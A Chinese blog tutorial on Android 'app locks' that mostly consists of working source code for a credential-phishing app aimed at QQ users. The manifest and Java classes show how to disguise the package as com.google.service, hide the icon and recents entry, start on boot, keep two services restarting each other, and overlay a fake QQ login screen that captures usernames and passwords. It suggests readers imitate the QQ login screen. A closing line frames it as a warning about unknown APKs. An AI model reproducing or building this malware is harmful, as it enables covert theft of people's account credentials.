android应用锁可以做的一些事

目前android市场上有很多的android应用锁的app,用来保证手机上个人隐私的目的,但是就我个人而言,”来路不明”的应用锁可能同样会给我们打来很大的危险,今天,带大家使用android应用锁来盗取用户的账号.

原理

首先需要说下应用锁的实现原理,就是在我们的service中不断地检查当前最顶端,也就是当前显示的activity所在的报名,如果是我们希望截获的报名,则跳转到一个我们自己的activity,比如qq,我们这个activity和qq的登录界面是一样的,这样当用户输入username和password的时候,我们就可以得到用户的账号信息了。

实现

注意,我们的应用需要隐藏自己不被用户发现,所以这里我给自己的应用apklock的包名是”com.google.service”,并且使用的是原声的android机器人作为apklock的图标,可是说到这里,就有人会问了,那么我们的应用不还是显示在了home桌面了吗,no,先看下AndroidManifest.xml吧。

清单文件

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.service" android:versionCode="1" android:versionName="1.0" >

    <uses-sdk  android:minSdkVersion="11" android:targetSdkVersion="18" />

    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

    <application  android:allowBackup="true" android:persistent="true" android:process="com.android.core" >
        <activity  android:name="com.google.service.MainActivity" android:excludeFromRecents="true" android:theme="@style/mainTheme" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <!-- 下面这两个data标签是隐藏该应用的桌面图标的 -->
                <data android:scheme="access" />
                <data android:host="com.example.apklock" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity  android:name="com.google.service.LoginActivity" android:excludeFromRecents="true" >
        </activity>

        <service  android:name="com.google.service.AppService" android:enabled="true" >

            <!-- 设置service的优先级为最高 -->
            <intent-filter android:priority="1000" >
            </intent-filter>
        </service>
        <service  android:name="com.google.service.DamenService" android:enabled="true" >

            <!-- 设置service的优先级为最高 -->
            <intent-filter android:priority="1000" >
            </intent-filter>
        </service>

        <receiver android:name="com.google.service.BootStartReceiver" >
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </receiver>
    </application>
</manifest>

这里我先简单的说明下:

 <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

这两个权限:
android.permission.RECEIVE_BOOT_COMPLETED:是用来开机自启动的

android.permission.GET_TASKS 是读取当前task中有哪些个activity的权限

android:persistent=”true”和android:process=”com.android.core”是用来尽可能保证我们的service不被系统杀死,事实证明,除非用户多次clear应用,才可以杀死我们的service。

android:excludeFromRecents=”true” 这个属性用来隐藏我们的activity不被用户发现,加上这个属性以后,当用户查询最近的应用的时候,是看不到我们的应用的,如下图:
android应用锁可以做的一些事_第1张图片
加上这个属性以后,用户将看不到我们的activity。

 <data android:scheme="access" />
 <data android:host="com.example.apklock" />

这两个过滤的data就是在手机桌面隐藏我们的应用,也就是当应用被安装了以后,用户很难发现我们的应用。

启动主界面MainActivity

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        requestWindowFeature(Window.FEATURE_NO_TITLE);  
        // full screen 
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,WindowManager.LayoutParams.FLAG_FULLSCREEN);  

        if (!isServiceWork(this,"com.example.apklock.AppService")) {
            startService(new Intent(this,AppService.class));
        }
        finish();//没有setContentView方法,并且在启动完成service之后。立即finish该activity,以防被用户发现

    }

    @Override
    protected void onDestroy() {
        super.onDestroy();
        if (!isServiceWork(this,"com.example.apklock.AppService")) {
            startService(new Intent(this,AppService.class));
        }
    }

    /** * 判断某个服务是否正在运行的方法 * * @param mContext * @param serviceName * 是包名+服务的类名(例如:com.example.apklock.AppService) * @return true代表正在运行,false代表服务没有正在运行 */
    public static boolean isServiceWork(Context mContext, String serviceName) {
        boolean isWork = false;
        ActivityManager myAM = (ActivityManager) mContext
        .getSystemService(Context.ACTIVITY_SERVICE);
        List<RunningServiceInfo> myList = myAM.getRunningServices(Integer.MAX_VALUE);
        if (myList.size() <= 0) {
            return false;
        }
        for (int i = 0; i < myList.size(); i++) {
            String mName = myList.get(i).service.getClassName().toString();
            if (mName.equals(serviceName)) {
                isWork = true;
                break;
            }
        }
        return isWork;
    }

MainActivity还是比较简单的,可以看到我这里去掉了,setContentView方法,并且在启动AppService之后立即将自己finish掉了,这样还是为了隐藏自己。

核心的AppService

public class AppService extends Service {

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }

    @Override  
    public int onStartCommand(Intent intent, int flags, int startId) {  
        return START_STICKY;  //用于保证service被kill后重新创建
    }  

    @Override
    public void onStart(Intent intent, int startId) {
        super.onStart(intent, startId);
    }

    @Override
    public void onCreate() {
        super.onCreate();
        /** * 当service运行在低内存的环境时,将会kill掉一些存在的进程。因此进程的优先级将会很重要, * 可以使用startForeground API将service放到前台状态。这样在低内存时被kill的几率更低 */
        startForeground(0, new Notification()); 
        TimerTask task = new TimerTask() {

            @Override
            public void run() {
                ActivityManager mActivityManager;
                mActivityManager = (ActivityManager) AppService.this.getSystemService(Context.ACTIVITY_SERVICE);
                ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
                String packageName = topActivity.getPackageName();
                if (packageName.equals("com.tencent.mobileqq")) {
                    Intent intent = new Intent();
                    intent.setClass(AppService.this,LoginActivity.class);
                    intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                    startActivity(intent);
                }
                if (!MainActivity.isServiceWork(AppService.this,"com.example.apklock.DamenService")) {
                    startService(new Intent(AppService.this,DamenService.class));
                }
            }
        };

        Timer timer = new Timer();
        timer.schedule(task,0,100);//从现在开始,每隔100毫秒运行一次run方法

    }

    @Override
    public void onDestroy() {
        stopForeground(true);
        Intent localIntent = new Intent();  
        localIntent.setClass(this, AppService.class); 
        this.startService(localIntent);    //销毁时重新启动Service
    }
}

说明一下,在onStartCommand中return一个START_STICKY这样是尽可能保证我们的service被kill后重新创建,注意这里只是尽可能,不能够保证每一次都重启,那么如何保证service不被杀死呢??不着急,后边会说。

startForeground(0, new Notification()); 同样是将当前的service置为前台service,同样是不容易被系统kill掉。

在run方法中,查询当前正在运行的task的报名,如果和腾讯的报名时一样的,则跳转到我们的LoginActivity中。这里我通过Timer类的schedule方法,每隔100毫秒检测一次,这样间隔时间越短,越不容易被用户发现。

BootStartReceiver

BootStartReceiver.java这个类是用于开机自启动AppService

public class BootStartReceiver extends BroadcastReceiver {

    @Override
    public void onReceive(Context context, Intent intent) {
        if (intent.getAction().equals(Intent.ACTION_BOOT_COMPLETED)) {
            //开机自动启动这个service
            context.startService(new Intent(context,AppService.class));
        } 
    }
}

现在说下,我们如何保证service不被kill掉,这里我写了两个DamenService同时来检测当前task顶部的包名是否是”com.tencent.mobileqq”,同时这两个service互相监督对方的状态,如果被kill掉了,立即重启对方(service),这里我就不贴出代码了。

用来钓鱼的 LoginActivity

public class LoginActivity extends Activity implements OnClickListener,OnFocusChangeListener{
    EditText userNameText = null;
    EditText userPassText = null;
    Button submitButton = null;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        // TODO Auto-generated method stub
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_login);
        userNameText = $(R.id.username);
        userPassText = $(R.id.userpass);
        submitButton = $(R.id.loginbutton);
        //设置事件
        userNameText.setOnFocusChangeListener(this);
        userPassText.setOnFocusChangeListener(this);
        submitButton.setOnClickListener(this);

    }

    //使用泛型,让T继承自View,并且$方法返回的是T类型
    //这样做的好处是,使用findViewById不用向下转型了
    public <T extends View> T $(int id) {
        return (T) findViewById(id);
    }

    //这里重写onBackPressed方法,由于是用Intent.FLAG_ACTIVITY_NEW_TASK这种方式启动的activity,
    //所以如果这里实现默认的super.onBackPressed()的话,很快就会被用户发现
    @Override
    public void onBackPressed() {
        return;
    }

    @Override
    public void onClick(View v) {
        // TODO Auto-generated method stub
        Toast.makeText(LoginActivity.this,"username is :"+userNameText.getText().toString()+
                "==userpass is :"+userPassText.getText().toString(),Toast.LENGTH_SHORT).show();
    }

    @Override
    public void onFocusChange(View v, boolean hasFocus) {
        // TODO Auto-generated method stub
        switch (v.getId()) {
        case R.id.username:
            if (userNameText.getText().toString().equals("") && !hasFocus) {
                Toast.makeText(LoginActivity.this,"请输入username",Toast.LENGTH_SHORT).show();
                userNameText.setFocusable(!hasFocus);
            }
            break;
        case R.id.userpass:
            if (userPassText.getText().toString().equals("") && !hasFocus) {
                Toast.makeText(LoginActivity.this,"请输入password",Toast.LENGTH_SHORT).show();
                userNameText.setFocusable(!hasFocus);
            }
            break;

        default:
            break;
        }
    }
}

这里我的LoginActivity写的比较简单,大家伙可以自己高仿一个qq的登陆界面。

好了,看下效果先:

可以看到,当我们点击qq的时候会跳转到我们自己的loginActivity中,这样就有可能盗取一些用户的qq,并且两个service互相监听,不会被杀死,但是我这里还有一个问题没有解决,就是当用户多次频繁的将最近的应用清除的时候,我们的进程也就跟着挂了,这个问题,搞了半天,都没有搞定,有谁知道这个应该怎么实现,也请告知与我,感谢。

好了,说了这么多,就是为了说明来路不明的apk还是不要安装的好,不然手机出问题了,隐私被盗取了,都不知道是怎么回事。ok,关于android应用锁的学习就先到这里了。

源码下载

你可能感兴趣的:(android,锁,应用)